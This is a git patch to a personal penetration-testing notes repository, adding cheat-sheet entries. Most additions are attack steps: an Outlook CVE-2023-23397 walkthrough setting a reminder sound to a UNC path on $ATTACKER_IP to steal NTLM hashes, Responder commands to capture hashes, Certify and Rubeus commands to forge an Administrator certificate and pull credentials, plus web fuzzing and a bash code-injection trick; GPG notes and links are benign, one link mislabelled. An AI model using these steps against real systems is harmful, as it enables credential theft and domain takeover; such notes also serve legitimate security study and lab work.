From f1668bdc2a719d3ded69ece4e32d5598239595c6 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 25 Mar 2023 15:31:51 +0100 Subject: [PATCH] bump --- Cryptography/GPG-Cheatsheet.md | 12 +++++++ Cryptography/References.md | 1 + Enumeration/Websites.md | 13 ++++++++ Exploits/Linux/Bash.md | 14 ++++++++ Exploits/Windows/Outlook.md | 33 +++++++++++++++++++ Exploits/Windows/Responder.md | 30 +++++++++++++++++ .../Active Directory/ad_enumeration.md | 20 +++++++++++ Miscellaneous/References.md | 6 ++++ Post Exploitation/Windows/Windows PrivEsc.md | 1 + 9 files changed, 130 insertions(+) create mode 100644 Exploits/Linux/Bash.md create mode 100644 Exploits/Windows/Outlook.md diff --git a/Cryptography/GPG-Cheatsheet.md b/Cryptography/GPG-Cheatsheet.md index 2c0031e..f659453 100644 --- a/Cryptography/GPG-Cheatsheet.md +++ b/Cryptography/GPG-Cheatsheet.md @@ -1,5 +1,12 @@ # GPG Cheatsheet +## Generate Keypair + +* Generating a keypair via gpg +```sh +gpg --gen-key +``` + ## Encryption via GPG * Encryption of a file via gpg @@ -21,4 +28,9 @@ gpg --armor --symmetric --cipher-algo $PLAIN_TEXT gpg --output original_message.txt --decrypt $CIPHER ``` +## Encrypt & Sign an eMail +* Encryption and siging via gpg is done in the following way +```sh +gpg --encrypt --sign --armor -r bill.gates@microsoft.com message.txt +``` diff --git a/Cryptography/References.md b/Cryptography/References.md index 363480e..73ecc36 100644 --- a/Cryptography/References.md +++ b/Cryptography/References.md @@ -7,6 +7,7 @@ ### Online Tools +* [SSLshopper](https://www.tryhackme.com/) * [cryptool](https://cryptool.org) * [quipquip](https://quipquip.com) * [cryptii](https://cryptii.com/) diff --git a/Enumeration/Websites.md b/Enumeration/Websites.md index 82c74ad..e89d673 100644 --- a/Enumeration/Websites.md +++ b/Enumeration/Websites.md @@ -14,18 +14,31 @@ ### Fuzz Faster U Fool +* Simple Fuzzing ```sh ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt ``` + * Fuzz dirs ```sh ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt ``` + * Fuzz files ```sh ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt ``` +* Fuzz all existing websites regardless of HTTP status +```sh +ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP/FUZZ -fs 0 -mc all +``` + +* Fuzz with other HTTP methods like POST +```sh +ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -fs $SIZE -mc all -C POST +``` + #### Fuzz parameters ```sh diff --git a/Exploits/Linux/Bash.md b/Exploits/Linux/Bash.md new file mode 100644 index 0000000..9b4e275 --- /dev/null +++ b/Exploits/Linux/Bash.md @@ -0,0 +1,14 @@ +# Bash Exploit Possibilities + +## Eval + + +## Test + +Test includes `-eq`. It can be used to execute code which is evaluated before the comparison. [Vidarholen](https://www.vidarholen.net/contents/blog/?p=716) show examples on how to do it. +An example is the following +```sh +num=a[$(date >&2)]+42 +``` + +`date` get executed and the test `[[ $num -eq 42 ]]` gets evaluated to true diff --git a/Exploits/Windows/Outlook.md b/Exploits/Windows/Outlook.md new file mode 100644 index 0000000..55690a4 --- /dev/null +++ b/Exploits/Windows/Outlook.md @@ -0,0 +1,33 @@ +# Outlook Exploits + +## CVE-2023-23397 + +Create an Appointment with a custom and malicious reminder sound. The sound file download uses __Universal Naming Convention (UNC)__ paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target. + + +Therefore, __PidLidReminderFileParameter__ have to be altered containing the UNC, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__. +Further, __PidLidReminderOverride__ has to be set to __true__. + +### Usage + +`New Appointment` --> set `Reminder` to 0 minutes. + +`Outlook Spy` plugin is needed. Go to `OutlookSpy` tab, press `CurrentItem` and go to `Script` + +Set the following variables: + +```vbscript +AppointmentItem.ReminderOverrideDefault = true +AppointmentItem.ReminderPlaySound = true +AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav" +``` + +* Set up `responder -I ` to catch the NTLM hash. + +Press `Run` to save the variables. Send the appointment afterwards. + +### Resources + +* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git) + + diff --git a/Exploits/Windows/Responder.md b/Exploits/Windows/Responder.md index 1eae577..f1c2c9a 100644 --- a/Exploits/Windows/Responder.md +++ b/Exploits/Windows/Responder.md @@ -5,6 +5,36 @@ Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication ## Usage + +### Grab NTLM Token + +* Setup responder ```sh responder -I tun0 -wrvd ``` + +* Open an Shell on the windows target and request the attacker's SMB a.k.a responder +```sh +dir \\$ATTACKER_IP\C$ +``` + + +### Impersonate Domain -- Change Responder's certificates + +* After using nsupdate to add the attacker as a subdomain do the following tasks +* Add a certificate and its private key to +```sh +/usr/share/responder/certs +``` +* Edit `Responder.conf` +``` +[HTTPS Server] + +; Configure SSL Certificates to use +SSLCert = certs/cert.pem +SSLKey = certs/key.pem +``` +* Start responder +```sh +responder -I +``` diff --git a/Miscellaneous/Active Directory/ad_enumeration.md b/Miscellaneous/Active Directory/ad_enumeration.md index e2d88d5..6771e93 100644 --- a/Miscellaneous/Active Directory/ad_enumeration.md +++ b/Miscellaneous/Active Directory/ad_enumeration.md @@ -115,3 +115,23 @@ bloodhound --no-sandbox ## PowerView ## WMI + +## Find Certifications and Private Keys + +Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git). + +* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step +```sh +Certify.exe find /vulnerable /currentuser +.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator +``` + +* Copy the found key and convert it like mentioned in the last line of the ouptut, for example +```sh +openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx +``` + +* Get ticket with the the loot via Rubeus +``` +.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials +``` diff --git a/Miscellaneous/References.md b/Miscellaneous/References.md index 1dacb8e..2506a38 100644 --- a/Miscellaneous/References.md +++ b/Miscellaneous/References.md @@ -1,4 +1,10 @@ # Miscellaneous References ## Static Binaries + [andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git) + +## SuperTool + +* [SuperTool](https://mxtoolbox.com/SuperTool.aspx) + diff --git a/Post Exploitation/Windows/Windows PrivEsc.md b/Post Exploitation/Windows/Windows PrivEsc.md index c76930e..6d6d2cb 100644 --- a/Post Exploitation/Windows/Windows PrivEsc.md +++ b/Post Exploitation/Windows/Windows PrivEsc.md @@ -9,6 +9,7 @@ * [privescheck](https://github.com/itm4n/PrivescCheck) * [windows exploit suggester](https://github.com/bitsadmin/wesng) * [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) +* [Privilege Escalation Runbook](https://xorond.com/posts/2021/04/windows-local-privilege-escalation/) ## Account Types